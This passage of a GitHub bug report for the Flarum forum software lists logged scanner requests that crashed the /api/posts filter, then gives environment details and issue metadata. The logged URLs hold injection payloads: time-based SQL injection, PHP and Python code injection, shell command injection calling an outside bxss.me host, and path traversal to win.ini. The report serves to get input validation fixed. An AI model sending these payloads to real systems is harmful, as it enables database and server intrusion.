https://forum.example.com/api/posts?filter[discussion]=str(__import__('time').sleep(9))%2B__import__('socket').gethostbyname('hitrodbdrzpqd2f531.'%2B'bxss.me')&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=bxss.me/t/xss.html%3F%2500&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=posts%00&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=posts/.&page[near]=47
https://forum.example.com/api/posts?filter[discussion]='%2B'A'.concat(70-3).concat(22*4).concat(118).concat(73).concat(120).concat(74)%2B(require'socket'%0ASocket.gethostbyname('hitix'%2B'qnllbtgn8b779.bxss.me.')[3].to_s)%2B'&page[near]=47
https://forum.example.com/api/posts?filter[discussion]='\"()&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=';print(md5(31337));%24a='&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=%24{%40print(md5(31337))}&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=\"%2Bstr(__import__('time').sleep(9))%2B__import__('socket').gethostbyname('hitrodbdrzpqd2f531.'%2B'bxss.me')%2B\"&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=./492&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=http://bxss.me/t/fit.txt%3F.jpg&page[near]=47
https://forum.example.com/api/posts?filter[discussion][%24acunetix]=1&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=;(nslookup%20hitawjdoehpcpc5965.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitawjdoehpcpc5965.bxss.me')\")%7C(nslookup%20hitawjdoehpcpc5965.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitawjdoehpcpc5965.bxss.me')\")%26(nslookup%20hitawjdoehpcpc5965.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitawjdoehpcpc5965.bxss.me')\")&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=c:/windows/win.ini&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=posts&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=)&page[near]=47
https://forum.example.com/api/posts?filter[discussion]='\"&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=if(now()=sysdate()%2Csleep(15)%2C0)&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=0'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=-1%20OR%202%2B341-341-1=0%2B0%2B0%2B1&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=-1%20OR%203%2B341-341-1=0%2B0%2B0%2B1&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=0\"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR\"Z&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=if(now()=sysdate()%2Csleep(15)%2C0)&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=0'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'\"%2B(select(0)from(select(sleep(15)))v)%2B\"*/&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=-1;%20waitfor%20delay%20'0:0:15'%20--%20&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=0\"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR\"Z&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'\"%2B(select(0)from(select(sleep(15)))v)%2B\"*/&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=-1);%20waitfor%20delay%20'0:0:15'%20--%20&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=-1;%20waitfor%20delay%20'0:0:15'%20--%20&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=-1);%20waitfor%20delay%20'0:0:15'%20--%20&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=JRSRafql';%20waitfor%20delay%20'0:0:15'%20--%20&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=-5%20OR%20732=(SELECT%20732%20FROM%20PG_SLEEP(15))--&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=C8c9TFEh';%20waitfor%20delay%20'0:0:15'%20--%20&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=-5%20OR%20985=(SELECT%20985%20FROM%20PG_SLEEP(15))--&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=-5)%20OR%2083=(SELECT%2083%20FROM%20PG_SLEEP(15))--&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=-1))%20OR%20498=(SELECT%20498%20FROM%20PG_SLEEP(15))--&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=-5)%20OR%20550=(SELECT%20550%20FROM%20PG_SLEEP(15))--&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=-1))%20OR%20731=(SELECT%20731%20FROM%20PG_SLEEP(15))--&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=f3JlgeFr')%20OR%20653=(SELECT%20653%20FROM%20PG_SLEEP(15))--&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=yqP4S9Ou'))%20OR%20269=(SELECT%20269%20FROM%20PG_SLEEP(15))--&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=pTB3g7r3')%20OR%2062=(SELECT%2062%20FROM%20PG_SLEEP(15))--&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=seVaWQEa'%20OR%20323=(SELECT%20323%20FROM%20PG_SLEEP(15))--&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=%40%40Uq9ty&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=PrT82ZZj'))%20OR%20467=(SELECT%20467%20FROM%20PG_SLEEP(15))--&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=%40%40c9POq&page[near]=47

I also got multiple POST requests to /login endpoint, which resulted fatal errors, but I don't know how to reproduce it, since Flarum does not log POST data:

flarum.ERROR: Laminas\Diactoros\Exception\InvalidArgumentException: Laminas\Diactoros\ServerRequest::withParsedBody expects a null, array, or object argument; received string in vendor/laminas/laminas-diactoros/src/ServerRequest.php:17

Expected Behavior

No exceptions or fatal errors. Engine should validate requests and return 400 Bad Request response if request is invalid.

Screenshots

No response

Environment

  • Flarum version: 1.4.1
  • Website URL: -
  • Webserver: apache
  • Hosting environment: VPS
  • PHP version: 7.4

Output of php flarum info

Flarum core 1.4.1
PHP version: 7.4.30
MySQL version: 5.7.39-0ubuntu0.18.04.2-log
Loaded extensions: Core, date, libxml, openssl, pcre, zlib, filter, hash, pcntl, Reflection, SPL, session, standard, sodium, mysqlnd, PDO, xml, apcu, calendar, ctype, curl, dom, mbstring, FFI, fileinfo, ftp, gd, geoip, gettext, iconv, imagick, intl, json, exif, mcrypt, mysqli, pdo_mysql, apc, posix, readline, shmop, SimpleXML, sockets, sysvmsg, sysvsem, sysvshm, tokenizer, xmlreader, xmlwriter, xsl, zip, Phar, Zend OPcache
+--------------------------------------+------------+------------------------------------------+
| Flarum Extensions                    |            |                                          |
+--------------------------------------+------------+------------------------------------------+
| ID                                   | Version    | Commit                                   |
+--------------------------------------+------------+------------------------------------------+
| flarum-flags                         | v1.4.0     |                                          |
| flarum-subscriptions                 | v1.4.0     |                                          |
| flarum-tags                          | v1.4.0     |                                          |
| flarum-suspend                       | v1.4.0     |                                          |
| flarum-sticky                        | v1.4.0     |                                          |
| flarum-lock                          | v1.4.0     |                                          |
| flarum-approval                      | v1.4.0     |                                          |
| fof-follow-tags                      | 1.1.6      |                                          |
| v17development-seo                   | v1.8.0     |                                          |
| sycho-move-posts                     | v0.1.7     |                                          |
| kilowhat-audit-free                  | 1.5.1      |                                          |
| ianm-syndication                     | 1.2.2      |                                          |
| fof-user-directory                   | 1.2.3      |                                          |
| fof-user-bio                         | 1.1.0      |                                          |
| fof-upload                           | 1.2.3      |                                          |
| fof-spamblock                        | 1.0.2      |                                          |
| fof-socialprofile                    | 1.1.4      |                                          |
| fof-sitemap                          | 1.0.3      |                                          |
| fof-polls                            | 1.1.0      |                                          |
| fof-nightmode                        | 1.4.1      |                                          |
| fof-links                            | 1.1.1      |                                          |
| fof-gamification                     | dev-master | f8e99f29371fbdc7f7a9311f546ac78e9735f9f4 |
| fof-formatting                       | 1.0.2      |                                          |
| fof-default-user-preferences         | 1.1.1      |                                          |
| fof-best-answer                      | 1.2.3      |                                          |
| flarum-statistics                    | dev-master | 432321416d291f7e376121c877466dfba93ecb74 |
| flarum-pusher                        | v1.4.0     |                                          |
| flarum-mentions                      | v1.4.0     |                                          |
| flarum-markdown                      | v1.4.0     |                                          |
| flarum-likes                         | v1.4.0     |                                          |
| flarum-lang-english                  | v1.4.0     |                                          |
| flarum-emoji                         | v1.4.0     |                                          |
| flarum-bbcode                        | v1.4.0     |                                          |
| clarkwinkelmann-readonly-profile     | 1.0.0      |                                          |
| clarkwinkelmann-discussion-bookmarks | 2.0.0      |                                          |
| blomstra-usercard-stats              | 0.1.2      |                                          |
| blomstra-notification-deleter        | 0.2.1      |                                          |
| askvortsov-moderator-warnings        | v0.6.1     |                                          |
| askvortsov-discussion-templates      | v0.8.3     |                                          |
+--------------------------------------+------------+------------------------------------------+
Base URL: -
Installation path: -
Queue driver: redis
Mail driver: smtp
Debug mode: off

Possible Solution

No response

Additional Context

No response
@rob006 rob006 added the type/bug label Sep 5, 2022
@SychO9 SychO9 self-assigned this Apr 15, 2023
@SychO9 SychO9 added this to the 1.8 milestone Apr 15, 2023
@SychO9 SychO9 mentioned this issue Apr 16, 2023
Merged
10 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@SychO9 SychO9

Labels
type/bug
Projects
None yet
Milestone
1.8
Development

Successfully merging a pull request may close this issue.

fix: filter values are not validated flarum/framework
2 participants
@rob006 @SychO9